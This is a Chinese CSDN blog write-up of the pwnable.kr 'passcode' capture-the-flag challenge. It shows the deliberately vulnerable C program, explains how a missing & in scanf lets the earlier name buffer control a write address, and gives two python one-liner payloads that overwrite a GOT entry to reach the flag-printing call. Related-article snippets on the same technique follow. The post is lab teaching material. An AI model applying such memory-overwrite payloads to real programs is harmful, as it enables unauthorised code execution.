pwnable-passcode

最新推荐文章于 2019-12-15 11:32:03 发布
最新推荐文章于 2019-12-15 11:32:03 发布
阅读量145 收藏
点赞数
分类专栏: Hacker之路 文章标签: pwnable
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mcl2840072208/article/details/93312940
版权

源码 :

#include <stdio.h>
#include <stdlib.h>

void login(){
	int passcode1;
	int passcode2;

	printf("enter passcode1 : ");
	scanf("%d", passcode1);
	fflush(stdin);

	// ha! mommy told me that 32bit is vulnerable to bruteforcing :)
	printf("enter passcode2 : ");
        scanf("%d", passcode2);

	printf("checking...\n");
	if(passcode1==338150 && passcode2==13371337){
                printf("Login OK!\n");
                system("/bin/cat flag");
        }
        else{
                printf("Login Failed!\n");
		exit(0);
        }
}

void welcome(){
	char name[100];
	printf("enter you name : ");
	scanf("%100s", name);
	printf("Welcome %s!\n", name);
}

int main(){
	printf("Toddler's Secure Login System 1.0 beta.\n");

	welcome();
	login();

	// something after login...
	printf("Now I can safely trust you that you have credential :)\n");
	return 0;	
}

根据提示注意到问题 ,scanf("%d", passcode1); 遗漏了& 符号,导致执行scanf时 将修改passcode1 指向的地址。
使用gdb进行调试
在这里插入图片描述
welcome 和 login 是两次连续调用 ,
查看welcome 和login
在这里插入图片描述
在这里插入图片描述
两次ebp地址 , 且welcome 读入100个字符 , 我们可以发现刚好覆盖到passcode1 , 由于漏掉 & ,scanf() 的作用就是修改passcode1 指向地址的值 , 使用复写rop , 覆盖之后的函数,并将其指向我们希望的代码,
在这里插入图片描述

exp:

python -c "print 'C'*96 +'\x04\xa0\x04\x08' +'134514135\n'" |./passcode

python -c "print 'C'*96 +'\x00\xa0\x04\x08' +'134514135\n'" |./passcode
heri2
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pwnable.kr之passcode
river
05-03 6746
passcode          下载下来的源代码     从源代码分析看出来,在scanf的时候passcode1和passcode2没有加地址符号,因此会存在题目中所说的警告。   这道题木一共两个函数,welcome和Login,在welcome中输入了name字符串,然后在Login中输入了passcode1和passcode2,在passcode1=338150(0x5
pwnable.kr——passcode
xy_369的博客
05-10 106
⑩:综上,我们的思路是将 got 表中 printf 函数的地址(即0x0804A000)中存的值修改为 system("/bin/cat flag");的地址(0x080485E3)即可,随后程序执行到 printf 函数就相当于执行system("/bin/cat flag");函数,但已知我们只能控passcode1不能控passcode2,所以这题不能依靠修改passcode1,passcode2使程序正常执行来执行 system("/bin/cat flag");⑦:查找偏移,可知偏移为96。
pwnable 笔记 Toddler's Bottle - passcode
HiTaQini
11-03 2933
这题涉及到GOT覆写技术,我更新了一篇讲GOT覆写的文章,以这道题做的例子,讲的比较详细,大家可以参考一下: http://blog.csdn.net/smalosnail/article/details/53247502
Pwnablepasscode
neuisf的博客
12-15 257
pwnable第一道求助题 前几天开始做pwnable的练习题,前四题比较容易,到了第五题,本机调试可以获取flag,但是,在远程主机上却失败了。 原因:本机某地址可写入而远程主机该地址不可写导致程序异常。 漏洞:源代码passcode.c的第九行,scanf的参数passcode1未初始化且无&符号,导致实际读入的数字写入到了passcode1的值所代表的地址中,而不是读取到pas...
pwnable passcode 10pt
热门推荐
龙哥盟
03-18 3万+
题目在ssh passcode@pwnable.kr -p2222 (pw:guest)先看passcode.c:#include <stdio.h> #include <stdlib.h>void login(){ int passcode1; int passcode2; printf("enter passcode1 : "); s
passcode - pwnable
SkYe's Blog
08-24 322
passcode - pwnable 本题运用到GOT表覆写技术,先摘取一段来自Jing0107关于Linux的GOT和PLT的知识: GOT表: 概念:每一个外部定义的符号在全局偏移表(Global offset Table )中有相应的条目,GOT位于ELF的数据段中,叫做GOT段。 作用:把位置无关的地址计算重定位到一个绝对地址。程序首次调用某个库函数时,运行时连接编辑器(rtld)找到...
pwnable.kr】 passcode
think_ycx的专栏
07-09 544
下载程序scp -P 2222 -p passcode@pwnable.kr:/home/passcode/* ./漏洞信息程序main函数中,welcome和login存在栈复用,welcome调用gets向ebp-0x70读入100个字符。 login中scanf没有取地址,因此会把[ebp-10h]和[ebp-0xch]的内容当成要写入的地址。在welcome中,我们有一次布置数据的机会,可...
flutter-passcode:Flutter-密码锁定屏幕
05-02
import 'package:passcode_screen/passcode_screen.dart' ; 它能为您做什么? 只需创建一个漂亮的密码锁视图。 PasscodeScreen ( title : title, passwordEnteredCallback : _onPasscodeEntered, ...
iphone-passcode-unlocker.exe
11-20
iphone-passcode-unlocker.exe
Android代码-passcode
08-06
Passcode Android Passcode view Usage Adding to build.gradle for app ... url "http://dl.bintray.com/ashish29agre/passcode-repo" //for jitpack url "https://jitpack.io" } } XML Java PasscodeView passc
matlab开发-passcode
08-22
首先,我们来看`passcode.m`这个文件。这是一个MATLAB脚本或函数,它实现了`passcode`功能的核心逻辑。通常,这样的函数会包含以下关键部分: 1. **函数定义**:`function password = passcode(prompt, title, ...
gree-air-conditioner-passcode:格力空调开机密码暴力破解(Arduino)
05-06
适用于KW-35 开心就好,其实没有什么实际用途 起因 ...据学校不知道什么无聊部门的规定,安装空调的第二年才能用,但是那时候我已经毕业了…… ...安装一个叫“格力掌上通”的应用,并登录 输入大量空调安装信息(如业主...
pwnable.kr第二遍---passcode
leeham的博客
03-16 312
&gt;&gt;&gt;&gt;&gt;passcode1.题目中有两个scanf("%d",addr)的不标准格式按照scanf()的使用,应该是将stdin的整型数赋值给地址addr处而接下来的passcode1==338150&amp;&amp;passcode2=13371337两个判断条件其中passcode1和passcode2是整型int addr;假如输入100则*addr=100...
pwnable.kr-passcode
qq_35661990的博客
09-18 599
这道题的难点在于GOT表覆写,理解了GOT表和PLT表的关系就比较好做了。 函数在调用printf等函数的时候需要访问PLT表,而PLT表中储存的是GOT表对应项的地址。 另外一点就是scanf的参数如果没有加&amp;地址符,就会把参数所在栈内的4个字节(我认为是因为题目中要传入%d是四字节的int型吧)当作地址,然后把缓冲区的数据输入进去。(在IDA中看,就是有加地址符,程序会执行lea指...
pwnable.kr - passcode
ACdream
10-12 526
pwnable.kr passcode
pwnable.kr [Toddler's Bottle] - passcode
Re:Umiade.tr
03-27 539
Mommy told me to make a passcode based login system. My initial C code was compiled without any error! Well, there was some compiler warning, but who cares about that? ssh passcode@pwnable.k
pwnable.kr 之passcode summary
Bill
04-23 689
本人写这篇博客完全是为了方便以后查证,若能帮上各位的忙,在线非常宽慰. 关于pwnable.kr上的passcode,这博客写的很到位,大家不妨去看一下:passcode.我在这里只是补充几个问题,再将整个过程简单化而已. 1.plt表和got表的关系   plt表—->got表.当程序中有需要库函数时,该plt和got表上场了.我们来举一个简单的例子(test.c):#include <st
RSA加密解密算法
just do IT
02-27 2669
1 引言 1.1 任务概要 本次课程设计即完成RSA算法签名验证。 1.1.1 任务要求 (1)产生两个奇数,判断是否是素数。 (2)计算得到n=pq的值和φ(n)的值。 (3)设定加密用的参数e=17,用辗转相除法求得解密用的参数d。 (4)设默认要加密的明文为31631,使用模重复平方法对该明文进行加密和解密。 (5)给出辗转相除法求得解密用的参数d的演示过程,如图16演示。 (6)界面设计友...
passcode文件怎么打开
最新发布
12-02
要打开passcode文件,首先需要确认文件的格式和类型。如果这是一个文本文件,可以使用任何文本编辑器,如记事本、文本编辑器或专业的代码编辑器来打开它。在文件资源管理器或Finder中找到该文件,右键单击并选择...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值